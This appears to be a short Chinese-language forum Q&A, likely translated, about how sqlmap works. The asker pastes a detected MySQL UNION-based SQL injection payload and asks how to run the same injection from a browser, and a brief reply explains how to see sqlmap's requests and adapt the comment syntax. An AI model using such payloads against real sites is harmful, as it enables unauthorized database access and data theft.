我想了解SQLmap是如何工作的。Sqlmap流量捕獲
例如,sqlmap找到我的網站上注入 -
Place: GET
Parameter: selected
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#
使用SQLMAP,我可以轉儲數據庫,但如何轉儲從瀏覽器相同的數據庫?我試圖把下面的鏈接放到瀏覽器中,但它不起作用 -
http://www.site.com/index.php?act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#
我在瀏覽器中根本沒有得到任何結果。我試着用不同的方法把/ ** /和+等,但吸。
如何獲取Sqlmap發送的滲透測試的鏈接?
如何利用一個簡單的選擇版本()查詢與此注射?
也許這是不是真的工作?
如何獲取Sqlmap發送滲透測試的鏈接? 解決了我只是使用sqlmap密鑰-v 3 如何利用此注入簡單選擇版本()查詢?只需更改#與 - - 在瀏覽器 – 2012-08-28 11:10:41